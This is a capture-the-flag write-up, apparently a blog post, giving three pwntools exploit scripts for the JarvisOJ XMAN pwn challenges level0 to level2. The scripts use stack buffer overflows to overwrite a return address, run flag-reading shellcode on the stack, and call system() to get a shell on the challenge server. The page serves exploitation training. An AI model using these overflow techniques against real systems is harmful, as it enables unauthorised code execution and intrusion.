[XMAN]level0-level2


JarvisOJ [XMAN] level0, level1, level2 三道pwn题。

level0

from pwn import *
 
# Target is a 64-bit Linux binary, so p64() below emits 8-byte little-endian values.
context(os='linux', arch='amd64')

# Remote challenge service for level0.
conn = remote('pwn2.jarvisoj.com', 9881)

# Value written over the saved return address. The name suggests a function in
# the binary that calls system(); the binary is not shown on this page - confirm.
callsystem_addr = 0x0000000000400596

# Overflow layout: 0x80 filler bytes (presumably the size of the vulnerable
# stack buffer - confirm against the binary), 8 bytes covering the saved frame
# pointer, then the replacement return address.
# NOTE(review): a fixed-address overwrite like this only works when the binary
# has no stack canary and is not position-independent; either mitigation
# would stop it.
padding = cyclic(0x80)
saved_rbp_filler = cyclic(8)
payload = padding + saved_rbp_filler + p64(callsystem_addr)

conn.send(payload)

# Hand the connection over to the terminal.
conn.interactive()

level1

from pwn import *
 
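# Target is a 32-bit Linux binary, so p32() below emits 4-byte little-endian values.
context(os='linux', arch='i386')

# Remote challenge service for level1.
conn = remote('pwn2.jarvisoj.com', 9877)

# The banner carries a hex address between ':' and '?'. It is presumably the
# address of the vulnerable stack buffer - confirm against the binary. The
# exploit depends on this leak.
conn.recvuntil(':')
leaked_addr = int(conn.recvuntil('?', drop=True), 16)

# Overflow layout: 0x88 filler bytes, 4 bytes covering the saved frame pointer,
# the replacement return address, then the shellcode itself.
padding = cyclic(0x88)
saved_ebp_filler = cyclic(4)

# leaked + filler (0x88) + saved ebp (4) + return-address slot (4) is the first
# byte after the overwritten return address, which is where the shellcode sits.
shellcode_addr = leaked_addr + 0x88 + 4 + 4

# pwntools-generated i386 shellcode that prints the file named 'flag'.
# NOTE(review): running code from the stack requires an executable stack; with
# NX enabled or a stack canary present this payload would fail.
shellcode = asm(shellcraft.i386.linux.cat('flag'))

payload = padding + saved_ebp_filler + p32(shellcode_addr) + shellcode
conn.send(payload)

# print(...) with a single argument behaves the same on Python 2 and also
# parses on Python 3, unlike the bare print statement.
print(conn.recvall())
conn.close()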

level2

from pwn import *
 
# Target is a 32-bit Linux binary, so p32() below emits 4-byte little-endian values.
context(os='linux', arch='i386')

# Remote challenge service for level2.
conn = remote('pwn2.jarvisoj.com', 9878)

# Fixed addresses taken from the binary (not shown on this page):
# system_addr is presumably the entry used to call system(), and shell_addr
# presumably points at a command string inside the binary - confirm both.
system_addr = 0x08048320
shell_addr = 0x0804A024

# Overflow layout: 0x88 filler bytes, 4 bytes covering the saved frame pointer,
# the replacement return address, then a fake call frame for it.
padding = cyclic(0x88)
four_byte_filler = cyclic(4)

# In the i386 stack-argument convention the word after the new return address
# is the callee's own return address and the next word is its first argument,
# so the filler is reused as a dummy return address ahead of shell_addr.
# NOTE(review): hard-coded addresses only work for a non-PIE binary with no
# stack canary; both mitigations would stop this overwrite.
payload = (
    padding
    + four_byte_filler
    + p32(system_addr)
    + four_byte_filler
    + p32(shell_addr)
)
conn.send(payload)

# Hand the connection over to the terminal.
conn.interactive()
